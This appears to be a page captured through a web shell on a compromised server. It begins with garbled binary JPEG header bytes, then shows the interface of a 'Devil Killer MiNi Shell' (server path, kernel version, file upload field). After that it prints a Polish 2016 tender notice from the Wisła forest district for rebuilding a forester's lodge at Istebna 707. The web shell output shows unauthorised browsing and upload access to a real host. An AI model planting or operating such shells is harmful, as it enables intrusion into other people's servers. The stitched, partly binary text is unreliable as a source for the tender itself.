JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160516/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160516/122900-N-2016.html

<p class="kh_header"><b>Wisła: Przebudowa budynku mieszkalnego  Istebna 707</b><br>
<b>Numer ogłoszenia: 122900 - 2016; data zamieszczenia: 16.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Wisła , ul. Czarne 6, 43-460 Wisła, woj. śląskie, tel. 33 8552426, faks 33 8551160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_wisla/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku mieszkalnego  Istebna 707.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych na terenie Gminy Istebna w Leśniczówce Gańczorka Istebna nr 707, polegających na:
- rozbudowie kancelarii leśniczego,
- rozbudowie instalacji wod-kan, CO i elektrycznej,
- wymianie stolarki okiennej oraz malowaniu elewacji,
- wymianie ogrodzenia,
- utwardzeniu dojazdu, 
w zakresie umożliwiającym osiągnięcie  założonego celu.   
4.2.	Zakres zamówienia polega min. na:
1.   Rozbudowa kancelarii leśniczówki :
   a) Roboty rozbiórkowe i ziemne:
        - rozebraniu pokrycia dachu z blachy od strony budynku gospodarczego od 
          kominów w dół w kierunku okapu, wraz z rynnami i rurami spustowymi,
        - rozebraniu konstrukcji więźby dachowej na przybudówce wraz z deskowaniem i 
          łaceniem  dachu,
        - rozebraniu stropu drewnianego nad przybudówką - ociepleniu,  podsufitką i 
          belkami stropowymi,
        - wykuciu z muru okien,
        - rozebraniu murów, 
        - rozebraniu ocieplenia ze styropianu,
        - demontażu studzienki kanalizacji deszczowej,
        - wykonaniu wykopu pod fundamenty rozbudowy,
        - wykonaniu utylizacji styropianu pochodzącego z rozbiórki,
     b) Stan surowy rozbudowy kancelarii:
         - wytyczeniu geodezyjnym rozbudowy,
        - wykonaniu ław fundamentowych z betonu, 
        - wykonaniu ścian betonowych wyrównawczych,
        - wykonaniu stóp fundamentowych pod słupy zadaszenia wejścia,
        - wykonaniu zbrojenia ław fundamentowych i stóp pod słupy,
        - wykonaniu izolacji pionowej ścian fundamentowych,
        - wykonaniu izolacji cieplnej ścian fundamentowych,
     c) Ściany przyziemia i poddasza:
        - wykonaniu izolacji poziomej na ławach fundamentowych,
        - wykonaniu ścian przyziemia,
        - wykonaniu słupów żelbetowych na styku muru z budynkiem leśniczówki,
        - wykonaniu wieńca żelbetowego na ścianach pod murłatę,
        - wykonaniu przewodów wentylacyjnych,
     d) Konstrukcja dachu wraz z pokryciem:
        - osadzeniu murłat na wykonanych wieńcach,
        - umocowaniu krokwi na murłatach,
        - ułożeniu ekranu z folii dachowej,
        - przybiciu do krokwi kontrłaty, 
        - wykonaniu deskowania okapów,
        - nabiciu łaty  pod pokrycie dachu blachą trapezową powlekaną,
        - montażu uchwytów do mocowania rynien dachowych,
        - wykonaniu pokrycia dachu blachą trapezową powlekaną, 
        - montażu kominków wentylacyjnych, rynien dachowych i  rur spustowych,
     e) Zadaszenie wejścia:
        - wykonaniu z elementów drewnianych zadaszenia,
        - wykonaniu pokrycia dachu blachą trapezową powlekaną,
     g) Roboty wykończeniowe wewnętrzne:
        - wykonaniu stropu nad parterem, 
        - ułożeniu izolacji cieplnej, 
        - ułożeniu ekranu zabezpieczającego z folii paroszczelnej, 
     h) Ścianki działowe: 
        - wykonaniu ścianek przegrodowych,
      i) Tynki wewnętrzne, oblicowania i strop podwieszony:
        - wykonaniu na ścianach  tynków zwykłych z zaprawy cementowo-wapiennej, 
        - ułożeniu płytek w pomieszczeniach łazienki i kąciku kuchennym, 
        - wykonaniu podwieszenia sufitu z płyt gipsowo kartonowych  ognioodpornych, 
     j)   Stolarka okienna i drzwiowa:
        - zamontowaniu okna,
        - zamontowaniu ścianki przegrodowej z drzwiami i naświetlem,
        - zamontowaniu drzwi wejściowych ocieplanych,
        - zamontowaniu drzwi wewnętrznych,
        - zamontowaniu dwóch szafek wiszących w aneksie kuchennym, 
    k) Podłogi i posadzki:
        - wykonaniu podłoża na gruncie z gruzu z rozbiórki ścian,
        - wykonaniu podkładu z betonu żwirowego o grubości 10 cm,
        - wykonaniu izolacji poziomej na podłożu 
        - wykonaniu warstwy wyrównawczej,
        - wykonaniu posadzki z płytek,
     l) Malowanie pomieszczeń: 
        - ścian z tynku gładzi gipsowej,
        - pozostałych ścian i sufitów, 
    m) Elewacja części rozbudowanej:
        - ociepleniu ścian,
        - wykonaniu tynku żywiczno - mozaikowego,
    n) Drenaż opaskowy:
       - wykonaniu w istniejącym wykopie studzienki z  tworzywa
       - ułożeniu drenażu z rury drenarskiej, 
       - ułożeniu obrzeża betonowego,
                 - ułożeniu opaski wzdłuż ścian z płytek betonowych chodnikowych, 
       2. Rozbudowa instalacji wod-kan, CO i elektrycznej:
                  a)  instalacje wod-kan:
          - wykonaniu  wcinki do istniejącej kanalizacji z rur PCW i instalacji wodnej,
          - ułożeniu rurociągu z rur  i wykonaniu podejść pod urządzenia sanitarne    
          - wykonaniu obustronnych podejść pod wodomierz skrzydełkowy wraz z
            zamontowaniem wodomierza,
          - montażu elektrycznego  podgrzewacza c.w.u o pojemności 80 dcm3 wraz  z 
            zaworami odcinającymi i zaworem bezpieczeństwa oraz podłączeniu do 
            instalacji wody i instalacji elektrycznej,
          - zamontowaniu miski ustępowej na elemencie montażowym wraz z przyciskiem 
            podtynkowym,
          - montażu umywalki oraz półpostumentem,
          - montażu zlewozmywaka jednokomorowego z ociekaczem ze stali nierdzewnej, 
          - zamontowaniu baterii umywalkowej, zlewozmywakowej, natryskowej,
          - zamontowaniu kabiny natryskowej wraz z brodzikiem,
           b) Instalacje CO:
          - wstawieniu odgałęzień  na rurach instalacji CO w kotłowni,
          - ułożeniu rurociągu z rur, 
          - wykonaniu izolacji rurociągów otulinami izolacyjnymi,
          - montażu zaworów kulowych na instalacji w kotłowni,
          - montażu na ścianie grzejników,
          - montażu na grzejnikach  zaworów,
        c) Instalacje elektryczne:
         - ułożeniu przewodów, 
         - zamontowaniu puszek instalacyjnych, wyłączników i gniazdek,
         - zamontowaniu lampy, 
         - zamontowaniu kompletnej tablicy rozdzielczej z pełnym wyposażeniem,      
         - zamontowaniu w wiatrołapie, poczekalni i łazience w podłodze elektrycznej maty
              grzewczej,
          3. Wymiana stolarki okiennej oraz malowanie elewacji:
               - wymianie starej stolarki okiennej,
            - wykonaniu tynku na ościeżach po zamontowaniu nowych okien,
            - osadzeniu parapetów zewnętrznych z blachy powlekanej,
            - zagruntowaniu całej elewacji środkiem gruntującym,
            - pomalowaniu dwukrotnym całej elewacji farbą 
            - naprawieniu i uzupełnieniu płytek na schodach i podeście na wejściu głównym 
              do leśniczówki,
            - uzupełnieniu cokoliku na podeście wejściowym.
             4. Wymiana ogrodzenia:
            - rozebraniu ogrodzenia, 
           -  dostawie i montażu ogrodzenia,
           -  dostawie i montażu kompletnej bramy zamykanej mechanicznie na pilota wraz 
              z podłączeniem do instalacji elektrycznej.
           -  dostawie i montażu furtki,
          5. Utwardzenie dojazdu:
             - wykonaniu koryta pod warstwy konstrukcyjne z od wozem ziemi na odległość 
                do 1 km, 
             -  profilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne podbudowy, 
             - wykonaniu dolnej podbudowy z kruszywa o grubości 15 cm po uwałowaniu,
             - wykonaniu górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm 
               o grubości 8 cm po uwałowaniu,
             - ułożeniu krawężników betonowych o wym. 100x30x15 cm na podsypce 
                cementowo-piaskowej  na ławie betonowej,
             - ułożeniu obrzeży betonowych  8x30 na podsypce cementowo-piaskowej wraz 
                 z obetonowaniem,
             - ułożeniu nawierzchni z kostki brukowej betonowej  o wym. 20x10x8 cm na 
                podsypce cementowo piaskowej, 
             - obsypaniu terenu poza krawężnikami i obrzeżami ziemią pochodzącą 
                z korytowania oraz obsianiu trawą,
               6. Roboty końcowe:  
               - po zakończeniu robót teren należy uporządkować, a materiały 
                 niezabudowane należy usunąć z terenu budowy,
               - wykonaniu geodezyjnego pomiaru powykonawczego.  
4.3.    Szczegółowy opis przedmiotu zamówienia jest zawarty w : 
 a.  pięciu uproszczonych projektach, 
          b.  pięciu przedmiarach robót,
          c.  trzech Specyfikacjach Technicznych Wykonania i Odbioru Robót, 
        - łącznie stanowiących załącznik nr 7 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt.6 ustawy PZP do 50% wartości zamówienia robót budowlanych w otoczeniu i budynkach osady Leśniczówka Gańczorka Istebna 707.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.11.00-0, 45.21.00.00-2, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 5.000,00 złotych (słownie: pięć tysięcy 00/100 złotych).
9.2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;c) gwarancjach bankowych;d) gwarancjach ubezpieczeniowych; e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U.2014.1804 z późn. zm.).
9.3.	Termin i sposób wniesienia wadium.  9.3.1.Wadium wnoszone w formie pieniądza należy wnieść na rachunek bankowy PGL LP Nadleśnictwa Wisła  w  BGŻ S.A. Oddział Bielsko-Biała nr 34 2030 0045 1110 0000 0088 8110, 
9.3.2. Dokument potwierdzający wniesienie wadium w formie innej niż pieniądz należy złożyć w oryginale w Kasie PGL LP Nadleśnictwa Wisła, 43-460 Wisła, ul. 
Czarne 6. 9.3.3.	Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 9.3.3.1.	wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert. 9.3.3.2.	wnoszone w pozostałych formach oryginały dokumentów zostały złożone w Kasie PGL LP Nadleśnictwa Wisła przed upływem terminu na składanie ofert. 9.4.Wymagania dotyczące wadium wnoszonego w formie innej niż pieniądz. 9.4.1.Wadium w formach wymienionych w art. 45 ust. 6 pkt. 2 - 5 Prawa zamówień publicznych musi yć wystawione na PGL LP Nadleśnictwo Wisła.9.4.3.	Z treści poręczenia lub gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Prawa zamówień publicznych, na każde isemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. Gwarant nie może uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności jak również od przedłożenia jakiejkolwiek dodatkowej dokumentacji.9.5.	Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania.
W tym zakresie Zamawiający nie stawia żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga, aby Wykonawca:
wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwa) zamówienia o wartości, nie mniejszej niż 200.000,00 złotych brutto każde, w zakresie robót budowlanych zakończonych tj. remont, przebudowa lub budowa  budynków mieszkalnych, leśniczówek, budynków użyteczności publicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie stawia żadnych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.3.Dysponują osobami zdolnymi do wykonania zamówienia.
W tym zakresie Zamawiający wymaga, aby Wykonawca dysponował: 
co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami  budowlanymi, o których mowa w Prawie budowlanym lub odpowiadające im uprawnienia budowlane uzyskane na podstawie wcześniej obowiązujących przepisów.
UWAGA :
Zamawiający określa wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, stosownie do wymogów określonych w Prawie budowlanym, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów Prawa budowlanego oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2016.65).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.1.4.1.Posiadał środki finansowe lub zdolność kredytową nie mniejszą niż 200.000,00 złotych. 
6.1.4.2.Posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
